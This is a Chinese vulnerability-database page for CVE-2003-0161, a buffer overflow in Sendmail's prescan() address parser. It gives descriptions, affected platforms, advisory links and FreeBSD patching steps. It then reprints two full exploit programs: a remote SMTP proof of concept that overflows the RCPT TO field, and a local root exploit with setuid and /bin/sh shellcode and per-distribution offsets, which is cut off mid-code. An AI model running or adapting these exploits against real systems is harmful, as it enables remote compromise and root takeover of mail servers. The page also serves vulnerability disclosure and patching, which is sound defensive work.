CVE-2003-0161
CVSS10.0
发布时间 :2003-04-02 00:00:00
修订时间 :2016-10-17 22:30:15
NMCOES    

[原文]The prescan() function in the address parser (parseaddr.c) in Sendmail before 8.12.9 does not properly handle certain conversions from char and int types, which can cause a length check to be disabled when Sendmail misinterprets an input value as a special "NOCHAR" control value, allowing attackers to cause a denial of service and possibly execute arbitrary code via a buffer overflow attack using messages, a different vulnerability than CVE-2002-1337.


[CNNVD]Sendmail地址预扫描内存破坏漏洞(CNNVD-200304-025)

        
        大多数组织在他们网络内部的各个位置有各种邮件传输代理(MTA),其中至少有一个直接连接于互联网。Sendmail是其中最流行的MTA,据统计通过Sendmail处理的Internet邮件流量占了总数的50%到75%。许多UNIX和Linux工作站默认运行Sendmail。
        sendmail在处理邮件地址时缺少正确的长度检查,远程攻击者可以利用这个漏洞对Sendmail服务进行缓冲区溢出,可能以sendmail进程权限在系统上执行任意命令。
        此漏洞存在于prescan()过程中,此函数用于处理SMTP头中的EMAIL地址,由于在转换字符到整数时存在一个逻辑错误,导致能充分的检查email地址的长度。有特别创建地址的email消息可能触发一个栈溢出。
        这个漏洞是针对消息的,而不是针对连接的。也就是说这个漏洞是由特别创建的邮件消息的内容触发的,而不是由较低水平的网络通讯触发的。这一点很重要,因为没有漏洞的MTA会与其他网络内受保护MTA一同传送恶意消息。换句话说,即使站点的边界MTA使用的软件不是sendmail,网络内部存在漏洞的sendmail服务程序仍受威胁。能够利用这个漏洞的消息也能在未被发现的情况下穿透许多常见的报文过滤或防火墙。
        
        目前已经成功的利用这个漏洞在实验室环境中导致拒绝服务。在一些有漏洞的系统中可以利用这个漏洞执行代码。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:sendmail:sendmail_switch:3.0.2
cpe:/o:compaq:tru64:4.0f_pk7_bl18Compaq Tru64 4.0f PK7_BL18
cpe:/a:sendmail:sendmail:8.10.2Sendmail Sendmail 8.10.2
cpe:/o:sun:solaris:7.0::x86
cpe:/a:sendmail:sendmail:8.10.1Sendmail Sendmail 8.10.1
cpe:/o:hp:hp-ux:10.16HP HP-UX 10.16
cpe:/o:sun:solaris:2.5.1::ppc
cpe:/a:sendmail:sendmail:3.0Sendmail Sendmail 3.0
cpe:/a:sendmail:sendmail_switch:2.2.5
cpe:/a:sendmail:sendmail_switch:2.2.1
cpe:/o:compaq:tru64:5.1a_pk1_bl1Compaq Tru64 5.1a PK1_BL1
cpe:/a:sendmail:sendmail_switch:2.2.4
cpe:/o:compaq:tru64:4.0g_pk3_bl17Compaq Tru64 4.0g PK3_BL17
cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.5.1::x86
cpe:/a:sendmail:sendmail_switch:3.0
cpe:/o:hp:hp-ux:10.00HP HP-UX 10.00
cpe:/o:hp:hp-ux:10.24HP HP-UX 10.24
cpe:/a:sendmail:sendmail_switch:2.1.3
cpe:/a:sendmail:sendmail_switch:2.1.4
cpe:/a:sendmail:sendmail_switch:2.1.1
cpe:/o:compaq:tru64:5.0a_pk3_bl17Compaq Tru64 5.0a PK3_BL17
cpe:/a:sendmail:sendmail:8.9.3Sendmail Sendmail 8.9.3
cpe:/a:sendmail:sendmail:8.9.0Sendmail Sendmail 8.9.0
cpe:/a:sendmail:sendmail:8.12:beta10Sendmail Sendmail 8.12 Beta10
cpe:/a:sendmail:sendmail:8.9.2Sendmail Sendmail 8.9.2
cpe:/a:sendmail:sendmail:8.9.1Sendmail Sendmail 8.9.1
cpe:/o:compaq:tru64:4.0f_pk6_bl17Compaq Tru64 4.0f PK6_BL17
cpe:/o:hp:hp-ux:10.10HP HP-UX 10.10
cpe:/o:hp:hp-ux:10.26HP HP-UX 10.26
cpe:/o:sun:solaris:8.0::x86
cpe:/a:sendmail:sendmail:8.11.1Sendmail Sendmail 8.11.1
cpe:/a:sendmail:sendmail:8.11.0Sendmail Sendmail 8.11
cpe:/a:sendmail:sendmail:8.11.3Sendmail Sendmail 8.11.3
cpe:/a:sendmail:sendmail:8.11.2Sendmail Sendmail 8.11.2
cpe:/a:sendmail:sendmail:8.11.5Sendmail Sendmail 8.11.5
cpe:/a:sendmail:sendmail:8.12:beta12Sendmail Sendmail 8.12 Beta12
cpe:/a:sendmail:sendmail:8.11.4Sendmail Sendmail 8.11.4
cpe:/o:compaq:tru64:5.1_pk3_bl17Compaq Tru64 5.1 PK3_BL17
cpe:/a:sendmail:sendmail:8.11.6Sendmail Sendmail 8.11.6
cpe:/a:sendmail:sendmail:8.12:beta16Sendmail Sendmail 8.12 Beta16
cpe:/o:compaq:tru64:4.0fCompaq Tru64 4.0f
cpe:/o:compaq:tru64:4.0gCompaq Tru64 4.0g
cpe:/o:compaq:tru64:4.0bCompaq Tru64 4.0b
cpe:/o:compaq:tru64:5.1b_pk1_bl1Compaq Tru64 5.1b PK1_BL1
cpe:/o:compaq:tru64:4.0dCompaq Tru64 4.0d
cpe:/o:sun:solaris:7.0
cpe:/a:sendmail:sendmail_switch:2.1.2
cpe:/a:sendmail:sendmail_switch:2.1.5
cpe:/a:sendmail:sendmail:8.12:beta5Sendmail Sendmail 8.12 Beta5
cpe:/o:hp:hp-ux:10.01HP HP-UX 10.01
cpe:/o:hp:hp-ux:10.08HP HP-UX 10.8
cpe:/a:sendmail:sendmail:8.12:beta7Sendmail Sendmail 8.12 beta7
cpe:/o:compaq:tru64:5.1a_pk2_bl2Compaq Tru64 5.1a PK2_BL2
cpe:/o:compaq:tru64:5.1_pk6_bl20Compaq Tru64 5.1 PK6_BL20
cpe:/o:hp:hp-ux:10.09HP HP-UX 10.9
cpe:/o:compaq:tru64:5.1_pk4_bl18Compaq Tru64 5.1 PK4_BL18
cpe:/o:hp:sis
cpe:/o:sun:solaris:9.0::x86
cpe:/a:sendmail:sendmail:8.12.0Sendmail Sendmail 8.12.0
cpe:/a:sendmail:sendmail:8.12.2Sendmail Sendmail 8.12.2
cpe:/a:sendmail:sendmail:8.12.1Sendmail Sendmail 8.12.1
cpe:/a:sendmail:sendmail:8.12.4Sendmail Sendmail 8.12.4
cpe:/a:sendmail:sendmail:8.12.3Sendmail Sendmail 8.12.3
cpe:/a:sendmail:sendmail:8.12.6Sendmail Sendmail 8.12.6
cpe:/a:sendmail:sendmail:8.12.5Sendmail Sendmail 8.12.5
cpe:/o:sun:solaris:2.5
cpe:/o:compaq:tru64:5.1_pk5_bl19Compaq Tru64 5.1 PK5_BL19
cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.6
cpe:/o:hp:hp-ux:11.11HP-UX 11.11
cpe:/o:sun:solaris:2.5.1
cpe:/a:sendmail:sendmail:8.12.8Sendmail Sendmail 8.12.8
cpe:/a:sendmail:sendmail:8.12.7Sendmail Sendmail 8.12.7
cpe:/o:compaq:tru64:4.0d_pk9_bl17Compaq Tru64 4.0d PK9_BL17
cpe:/o:compaq:tru64:5.0fCompaq Tru64 5.0f
cpe:/a:sendmail:sendmail:8.10Sendmail Sendmail 8.10
cpe:/o:compaq:tru64:5.0aCompaq Tru64 5.0a
cpe:/o:hp:hp-ux_series_800:10.20HP hp-ux series 800 10.20
cpe:/o:sun:solaris:9.0::sparc
cpe:/o:hp:hp-ux:11.22HP-UX 11i v1.6
cpe:/o:hp:hp-ux:11.20HP-UX 11i v1.5
cpe:/o:hp:hp-ux:10.34HP HP-UX 10.34
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.4::x86
cpe:/a:sendmail:sendmail:2.6Sendmail Sendmail 2.6
cpe:/o:sun:solaris:9.0:x86_update_2
cpe:/a:sendmail:sendmail:2.6.1Sendmail Sendmail 2.6.1
cpe:/a:sendmail:sendmail:2.6.2Sendmail Sendmail 2.6.2
cpe:/o:compaq:tru64:5.1aCompaq Tru64 5.1a
cpe:/o:compaq:tru64:5.0_pk4_bl17Compaq Tru64 5.0 PK4_BL17
cpe:/o:compaq:tru64:5.1bCompaq Tru64 5.1b
cpe:/o:compaq:tru64:5.0_pk4_bl18Compaq Tru64 5.0 PK4_BL18
cpe:/a:sendmail:sendmail_switch:2.1
cpe:/a:sendmail:sendmail_switch:2.2
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/o:compaq:tru64:5.0Compaq Tru64 5.0
cpe:/a:sendmail:sendmail_switch:2.2.2
cpe:/a:sendmail:sendmail_switch:2.2.3
cpe:/o:compaq:tru64:5.1Compaq Tru64 5.1
cpe:/a:sendmail:sendmail:3.0.3Sendmail Sendmail 3.0.3
cpe:/o:compaq:tru64:5.1a_pk3_bl3Compaq Tru64 5.1a PK3_BL3
cpe:/a:sendmail:sendmail:3.0.2Sendmail Sendmail 3.0.2
cpe:/a:sendmail:sendmail:3.0.1Sendmail Sendmail 3.0.1
cpe:/o:hp:hp-ux_series_700:10.20HP hp-ux series 700 10.20
cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/a:sendmail:sendmail_switch:3.0.1
cpe:/o:hp:hp-ux:10.30HP HP-UX 10.30
cpe:/o:hp:hp-ux:11.0.4HP HP-UX 11.0.4
cpe:/a:sendmail:sendmail_switch:3.0.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0161
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0161
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-025
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2003-016.0.txt
(UNKNOWN)  CALDERA  CSSA-2003-016.0
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:07.sendmail.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-03:07
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.11/SCOSA-2004.11.txt
(UNKNOWN)  SCO  SCOSA-2004.11
ftp://patches.sgi.com/support/free/security/advisories/20030401-01-P
(UNKNOWN)  SGI  20030401-01-P
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000614
(UNKNOWN)  CONECTIVA  CLA-2003:614
http://lists.apple.com/mhonarc/security-announce/msg00028.html
(UNKNOWN)  CONFIRM  http://lists.apple.com/mhonarc/security-announce/msg00028.html
http://lists.grok.org.uk/pipermail/full-disclosure/2003-March/004295.html
(UNKNOWN)  FULLDISC  20030329 Sendmail: -1 gone wild
http://marc.info/?l=bugtraq&m=104896621106790&w=2
(UNKNOWN)  BUGTRAQ  20030329 sendmail 8.12.9 available
http://marc.info/?l=bugtraq&m=104897487512238&w=2
(UNKNOWN)  BUGTRAQ  20030329 Sendmail: -1 gone wild
http://marc.info/?l=bugtraq&m=104914999806315&w=2
(UNKNOWN)  BUGTRAQ  20030330 [OpenPKG-SA-2003.027] OpenPKG Security Advisory (sendmail)
http://sunsolve.sun.com/search/document.do?assetkey=1-26-52620-1
(UNKNOWN)  SUNALERT  52620
http://sunsolve.sun.com/search/document.do?assetkey=1-26-52700-1
(UNKNOWN)  SUNALERT  52700
http://sunsolve.sun.com/search/document.do?assetkey=1-77-1001088.1-1
(UNKNOWN)  SUNALERT  1001088
http://www.cert.org/advisories/CA-2003-12.html
(VENDOR_ADVISORY)  CERT  CA-2003-12
http://www.debian.org/security/2003/dsa-278
(UNKNOWN)  DEBIAN  DSA-278
http://www.debian.org/security/2003/dsa-290
(UNKNOWN)  DEBIAN  DSA-290
http://www.gentoo.org/security/en/glsa/glsa-200303-27.xml
(UNKNOWN)  GENTOO  GLSA-200303-27
http://www.kb.cert.org/vuls/id/897604
(UNKNOWN)  CERT-VN  VU#897604
http://www.redhat.com/support/errata/RHSA-2003-120.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:120
http://www.redhat.com/support/errata/RHSA-2003-121.html
(UNKNOWN)  REDHAT  RHSA-2003:121
http://www.securityfocus.com/archive/1/321997
(UNKNOWN)  BUGTRAQ  20030520 [Fwd: 127 Research and Development: 127 Day!]
http://www.securityfocus.com/archive/1/archive/1/316961/30/25250/threaded
(UNKNOWN)  BUGTRAQ  20030331 GLSA: sendmail (200303-27)
http://www.securityfocus.com/archive/1/archive/1/317135/30/25220/threaded
(UNKNOWN)  IMMUNIX  IMNX-2003-7+-002-01
http://www.securityfocus.com/bid/7230
(VENDOR_ADVISORY)  BID  7230

- 漏洞信息

Sendmail地址预扫描内存破坏漏洞
危急 边界条件错误
2003-04-02 00:00:00 2010-02-14 00:00:00
远程※本地  
        
        大多数组织在他们网络内部的各个位置有各种邮件传输代理(MTA),其中至少有一个直接连接于互联网。Sendmail是其中最流行的MTA,据统计通过Sendmail处理的Internet邮件流量占了总数的50%到75%。许多UNIX和Linux工作站默认运行Sendmail。
        sendmail在处理邮件地址时缺少正确的长度检查,远程攻击者可以利用这个漏洞对Sendmail服务进行缓冲区溢出,可能以sendmail进程权限在系统上执行任意命令。
        此漏洞存在于prescan()过程中,此函数用于处理SMTP头中的EMAIL地址,由于在转换字符到整数时存在一个逻辑错误,导致能充分的检查email地址的长度。有特别创建地址的email消息可能触发一个栈溢出。
        这个漏洞是针对消息的,而不是针对连接的。也就是说这个漏洞是由特别创建的邮件消息的内容触发的,而不是由较低水平的网络通讯触发的。这一点很重要,因为没有漏洞的MTA会与其他网络内受保护MTA一同传送恶意消息。换句话说,即使站点的边界MTA使用的软件不是sendmail,网络内部存在漏洞的sendmail服务程序仍受威胁。能够利用这个漏洞的消息也能在未被发现的情况下穿透许多常见的报文过滤或防火墙。
        
        目前已经成功的利用这个漏洞在实验室环境中导致拒绝服务。在一些有漏洞的系统中可以利用这个漏洞执行代码。
        

- 公告与补丁

        厂商补丁:
        FreeBSD
        -------
        FreeBSD已经为此发布了一个安全公告(FreeBSD-SA-03:07)以及相应补丁:
        FreeBSD-SA-03:07:a second sendmail header parsing buffer overflow
        链接:ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:07.sendmail.asc
        补丁下载:
        执行以下方法之一:
        1)升级有漏洞的系统到4-STABLE或4.8-RELEASE;或修复日期以后的RELENG_5_0,
        RELENG_4_7或RELENG_4_6安全版本(分别是5.0-RELEASE-p7,4.7-RELEASE-p10,或
        4.6.2-RELEASE-p13)
        2) 对当前系统安装补丁:
        以下补丁可以应用到FreeBSD 4.6,4.7和5.0系统。
        a) 从以下地址下载相关补丁,并利用PGP工具验证独立的PGP签名。
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail.patch
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail.patch.asc
        b)以root执行以下命令:
        # cd /usr/src
        # patch < /path/to/patch
        # cd /usr/src/lib/libsm
        # make obj && make depend && make
        # cd /usr/src/lib/libsmutil
        # make obj && make depend && make
        # cd /usr/src/usr.sbin/sendmail
        # make obj && make depend && make && make install
        c)重启sendmail。以root执行以下命令:
        # /bin/sh /etc/rc.sendmail restart
        3) 仅对i386系统已经发行了打过补丁的sendmail二进制程序。根据你的FreeBSD版本
        和你是否需要STARTTLS支持选择合适的二进制程序。如果你需要STARTTLS支持,你必
        须安装了加密版本。
        a) 从以下位置下载相关的二进制程序并使用PGP工具验证独立的PGP签名。
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.6-i386-crypto.bin.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.6-i386-crypto.bin.gz.asc
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.6-i386-nocrypto.bin.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.6-i386-nocrypto.bin.gz.asc
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.7-i386-crypto.bin.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.7-i386-crypto.bin.gz.asc
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.7-i386-nocrypto.bin.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.7-i386-nocrypto.bin.gz.asc
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-5.0-i386-crypto.bin.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-5.0-i386-crypto.bin.gz.asc
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-5.0-i386-nocrypto.bin.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-5.0-i386-nocrypto.bin.gz.asc
        b) 安装二进制程序。以root执行以下命令。请注意这些例子使用了FreeBSD 4.7加密
        二进制程序。用BINARYGZ替换在步骤(a)中下载的文件名。
        # BINARYGZ=/path/to/sendmail-4.7-i386-crypto.bin.gz
        # gunzip ${BINARYGZ}
        # install -s -o root -g smmsp -m 2555 ${BINARYGZ%.gz} /usr/libexec/sendmail/sendmail
        c) 重新启动sendmail。以root执行以下命令。
        # /bin/sh /etc/rc.sendmail restart
        VI. 更新细节
        下面列出了已修正的FreeBSD版本中每个被修改文件的更新号。
        路径 更新
         版本
        - -------------------------------------------------------------------------
        RELENG_4
         src/contrib/sendmail/FREEBSD-upgrade 1.1.2.16
         src/contrib/sendmail/RELEASE_NOTES 1.1.1.3.2.15
         src/contrib/sendmail/cf/README 1.1.1.3.2.15
         src/contrib/sendmail/cf/cf/submit.cf 1.1.1.1.2.8
         src/contrib/sendmail/cf/m4/cfhead.m4 1.3.6.8
         src/contrib/sendmail/cf/m4/proto.m4 1.1.1.4.2.13
         src/contrib/sendmail/cf/m4/version.m4 1.1.1.3.2.15
         src/contrib/sendmail/cf/mailer/usenet.m4 1.1.1.2.6.3
         src/contrib/sendmail/contrib/buildvirtuser 1.1.1.1.2.5
         src/contrib/sendmail/doc/op/op.me 1.1.1.3.2.15
         src/contrib/sendmail/editmap/editmap.8 1.1.1.1.2.2
         src/contrib/sendmail/include/sm/bdb.h 1.1.1.1.2.2
         src/contrib/sendmail/include/sm/conf.h 1.1.1.1.2.7
         src/contrib/sendmail/libmilter/docs/api.html 1.1.1.1.2.2
         src/contrib/sendmail/libmilter/docs/design.html 1.1.1.1.2.2
         src/contrib/sendmail/libmilter/docs/index.html 1.1.1.1.2.2
         src/contrib/sendmail/libmilter/docs/installation.html 1.1.1.1.2.3
         src/contrib/sendmail/libmilter/docs/other.html &nb

- 漏洞信息 (24)

Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit (EDBID:24)
linux remote
2003-04-30 Verified
25 bysin
N/A [点击下载]
/*
 * Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit by bysin
 * 
 * This is to prove that the bug in sendmail 8.12.8 and below is vulnerable.
 * On sucessful POC exploitation the program should crash with the following:
 *
 * Program received signal SIGSEGV, Segmentation fault.
 * 0x5c5c5c5c in ?? ()
 *
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>

int maxarch=1;
struct arch {
	char *os; // The OS
	int pos; // The position of ebp in the stack, with the last byte being 0x00
	int apos; // The amount of bytes after pvpbuf where ebp is located
	unsigned long addr; // The pointer to the addr buffer
} archs[] = {
	{"FreeBSD 4.7-RELEASE",180,28,0xbfbfdad1},
};


/////////////////////////////////////////////////////////

#define BUFSIZE 50096

void header() {
	printf("Sendmail 8.12.8 prescan() exploit by bysin\n\n");
}

void printtargets() {
	unsigned long i;
	header();
	printf("\t  Target\t Addr\t\t OS\n");
	printf("\t-------------------------------------------\n");
	for (i=0;i<maxarch;i++) printf("\t* %d\t\t 0x%08x\t %s\n",i,archs[i].addr,archs[i].os);
	printf("\n");
}

void printresponse(char *a) {
	printf("%s\n",a);
}

void writesocket(int sock, char *buf) {
	if (send(sock,buf,strlen(buf),0) <= 0) {
		printf("Error writing to socket\n");
		exit(0);
	}
	printresponse(buf);
}

void readsocket(int sock, int response) {
	char temp[BUFSIZE];
	memset(temp,0,sizeof(temp));
	if (recv(sock,temp,sizeof(temp),0) <= 0) {
		printf("Error reading from socket\n");
		exit(0);
	}
	if (response != atol(temp)) {
		printf("Bad response: %s\n",temp);
		exit(0);
	}
	else printresponse(temp);
}

void relay(int sock) {
	while(1) {
		char temp[BUFSIZE];
		memset(temp,0,sizeof(temp));
		if (recv(sock,temp,sizeof(temp),0) <= 0) {
			printf("Server vulnerable (crashed)\n");
			exit(0);
		}
		printresponse(temp);
		if (atol(temp) == 553) {
			printf("Not exploitable\n");
			exit(0);
		}
	}
}

int main(int argc, char **argv) {
	struct sockaddr_in server;
	unsigned long ipaddr,i,j,m;
	int sock,target;
	char tmp[BUFSIZE],buf[BUFSIZE],*p,*pos=NULL;
	if (argc <= 2) {
		printf("%s <target ip> <target number>\n",argv[0]);
		printtargets();
		return 0;
	}
	target=atol(argv[2]);
	if (target < 0 || target >= maxarch) {
		printtargets();
		return 0;
	}

	header();

	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		printf("Unable to create socket\n");
		exit(0);
	}
	server.sin_family = AF_INET;
	server.sin_port = htons(25);
	printf("Resolving address... ");
	fflush(stdout);
	if ((ipaddr = inet_addr(argv[1])) == -1) {
		struct hostent *hostm;
		if ((hostm=gethostbyname(argv[1])) == NULL) {
			printf("Unable to resolve address\n");
			exit(0);
		}
		memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
	}
	else server.sin_addr.s_addr = ipaddr;
	memset(&(server.sin_zero), 0, 8);
	printf("Address found\n");
	printf("Connecting... ");
	fflush(stdout);
	if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
		printf("Unable to connect\n");
		exit(0);
	}
	printf("Connected\n");
	printf("Sending exploit... \n");
	fflush(stdout);

	readsocket(sock,220);

	writesocket(sock,"HELO yahoo.com\r\n");
	readsocket(sock,250);

	writesocket(sock,"MAIL FROM: <a@yahoo.com>\r\n");
	readsocket(sock,250);

	memset(buf,0,sizeof(buf));
	strcpy(buf,"RCPT TO: ");
	p=buf+strlen(buf);
	for (i=1,j=0,m=0;i<1242;i++) {
		if (!(i%256)) {
			*p++=';';
			j++;
		}
		else {
			if (j < 4) *p++='A';
			else {
				if (m == archs[target].pos) pos=p;
				//if (m > archs[target].pos) *p++='B'; else
				*p++='A';
				m++;
			}
		}
	}
	if (pos) memcpy(pos,(char*)&archs[target].addr,4);
	*p++=';';
	for (i=0;i<archs[target].apos;i++) {
		*p++='\\';
		*p++=0xff;
	}
	strcat(buf,"\r\n");
	writesocket(sock,buf);

	relay(sock);
}


// milw0rm.com [2003-04-30]
		

- 漏洞信息 (22442)

sendmail 8.11.6 Address Prescan Memory Corruption Vulnerability (EDBID:22442)
unix remote
2003-03-29 Verified
0 sorbo
N/A [点击下载]
source: http://www.securityfocus.com/bid/7230/info

A vulnerability in Sendmail may be exploited remotely to execute arbitrary code. The flaw is present in the 'prescan()' procedure, which is used for processing email addresses in SMTP headers. This condition has been confirmed to be exploitable by remote attackers to execute instructions on target systems. This vulnerability stems from a logic error in the conversion of a char to an integer value. The issue has been fixed Sendmail 8.12.9. 

/*
 * local exploit for sendmail 8.11.6 
 * by sorbo (sorbox@yahoo.com)
 * http://www.darkircop.org
 *
 * This exploit takes advantage of the vulnerable prescan() function that 
 * allows the user to input 0xff in order to skip the length check of the buffer.
 *
 * The vulnerability was found by Michal Zalewski
 *
 * The goal is to overwrite the 2 lsb of the saved frame pointer and make it 
 * point to an area we control.
 *
 * We can overflow pvpbuf[] in parseaddr() (which calls prescan()) and overwrite 
 * parseaddr's saved frame pointer. 
 * When parseaddr() returns, the control is back to sendtolist() but the frame pointer
 * will be modified (we make it point to somewhere in pvpbuf).
 * We can't just fill pvpbuf with the ret value we want, since sendtolist() doesn't
 * exit right away, but instead makes use of some variables.
 * We need therefore to construct pvpbuf in an intelligent way, so references to variables
 * will be valid.
 * The first variable to set is delimptr (located at ebp - something). 
 * We simply make this point to a 0, so the for loop exits.
 * The next variable to set is al (located at ebp - something ). We need to make a->q_next 
 * point to 0 so the while loop exits. a->q_next is a+11*4.
 * The next variable is e (ebp + something). We make it point to a 0
 * The next variable is bufp (ebp - something). This needs to be equal to buf to skip the free.
 * This cannot be done since the address contains a 0xff and this cannot be input in pvpbuf.
 * We just make it point to a valid chunk (in our case... our fake chunk). We can't make it point
 * to stack since arena_for_ptr() will fail. Luckily our arguments get copied on the heap, so we 
 * just point it to that.
 * Next we just set the ret (ebp + 4) to our shellcode and when sendtolist() exits our
 * shellcode will be executed. Note shellcode is even copied on heap, so non executable stacks will not
 * stop the exploit (the ret addr must match the shellcode location on the heap though)
 *
 * Note that if we overflow ebp by only one byte (putting a 0) i.e. the classical way
 * will not work since the register will not point to pvpbuf. What we do is overwrite two
 * bytes with 0x005c. Then we fill up the stack (by passing a long argument) so we lower the 
 * address of pvpbuf untill it is in the range of the ebp. Also our shellcode will be at a low
 * stack address < 0xbffefefe (since we cannot write 0xff in pvpbuf).
 *
 * NOTE: sendmail 8.12.8 cannot be exploited this way since there is an assert() which cannot
 * be bypassed (in sendtolist()).
 *
 * have fun
 *
 * Greetz: Knight420, Stefano Biondi, nevez
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
              

char shellcode[] =
	/* NOPs (so we don't have to be exact in shellcode addr calculation) */
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

        /* setuid(0); */
        "\x31\xdb"                              /* xor %ebx,%ebx */
        "\x89\xd8"                              /* mov %ebx,%eax */
        "\xb0\x17"                              /* mov $0x17,%al */
        "\xcd\x80"                              /* int $0x80     */

        /* setgid(0); */
        "\x31\xdb"                              /* xor %ebx,%ebx */
        "\x89\xd8"                              /* mov %ebx,%eax */
        "\xb0\x2e"                              /* mov $0x2e,%al */
        "\xcd\x80"                              /* int $0x80     */

        /* /bin/sh execve(); */
        "\x31\xc0"                              /* xor  %eax,%eax   */
        "\x50"                                  /* push %eax        */
        "\x68\x2f\x2f\x73\x68"                  /* push $0x68732f2f */
        "\x68\x2f\x62\x69\x6e"                  /* push $0x6e69622f */
        "\x89\xe3"                              /* mov  %esp,%ebx   */
        "\x50"                                  /* push %eax        */
        "\x53"                                  /* push %ebx        */
        "\x89\xe1"                              /* mov  %esp,%ecx   */
        "\x31\xd2"                              /* xor  %edx,%edx   */
        "\xb0\x0b"                              /* mov  $0xb,%al    */
        "\xcd\x80"                              /* int  $0x80       */

        /* exit(0); */
        "\x31\xdb"                              /* xor %ebx,%ebx */
        "\x89\xd8"                              /* mov %ebx,%eax */
        "\xb0\x01"                              /* mov $0x01,%al */
        "\xcd\x80";                             /* int $0x80     */




/* NOTE: not all characters are passable:
 *	0x00 (duh), 0xff, 0x09-0x0d, 0x20-0x22, 0x25, 0x28, 0x29, 0x2b, 0x2c
 *	0x2e,0x2f,0x3a-0x3c,0x3e,0x40,0x5b,0x5d,0x5e,0x80-0x9f 
 *
 * the REAL variables are only pvpbuf and chunk... so don't get scared by all these
 * required variables. Most of them are fixed =D.
 */
struct target_info {
	char *description;	/* target description */
	char *sendmail;		/* sendmail path */
	int stack_len;		/* how much stuff to put in stack */
	int distance;		/* distance in bytes from pvpbuf to last 2 bytes of saved framepointer */
	int ebp;		/* the value ebp will have */
	int pvpbuf;		/* address of pvpbuf */
	int zero;		/* address of a 0 in memory */
	int chunk;		/* address of a chunk to free */
	int ret;		/* address of shellcode (aprox 0xc0000000 - stack_len) */
	int delimptr;		/* delimptr -ebp */
	int al;			/* al - ebp */
	int e;			/* e - ebp */
	int bufp;		/* bufp - ebp */
	
};


struct target_info targets[] = {

	{"Slackware 8.0","/usr/sbin/sendmail",123090,1258,0xbffe005c,0xbffdfef4,0xbffe15d6,0x80f30a0,0xbffe1f36,-264,-268,24,-284},	
        {"Redhat 7.3","/usr/sbin/sendmail.sendmail",123074,1290,0xbffe005c,0xbffdfcd0,0xbffe19a6,0x80f30a0,0xbffe1f36,-300,-304,24,-320},
	{"Redhat 7.2","/usr/sbin/sendmail",123090,1290,0xbffe005c,0xbffdfcd0,0xbffe19a6,0x80f30a0,0xbffe1f36,-300,-304,24,-320}        
};



/* return 1 if successfull
 * 0 if failed
 *
 */
int exploit(struct target_info target) {
	char *stackfiller=0;	/* data to lower stack (we can put fake chunks and shellcode here) */
	char egg[1024*3];	/* the argment to prescan() */
	char *ptr;
	int  *ptr2;
	int i;
	int pid;
	char *arg[] = { "owned",egg,stackfiller,NULL};


	

	/* prepare stack filler */
	stackfiller = (char*) malloc(target.stack_len);
	if(!stackfiller) {
		perror("malloc()");
		exit(0);
	}
	
	memset(stackfiller,'A',target.stack_len);
	*(stackfiller+target.stack_len-1) = 0;

	ptr = stackfiller;
	
        while(1) {
		/* fake chunk */
	        char *chunk = 	"\xfc\xff\xff\xff"
	        		"\xfc\xff\xff\xff"
	        		"\xa1\xff\xff\xbf"
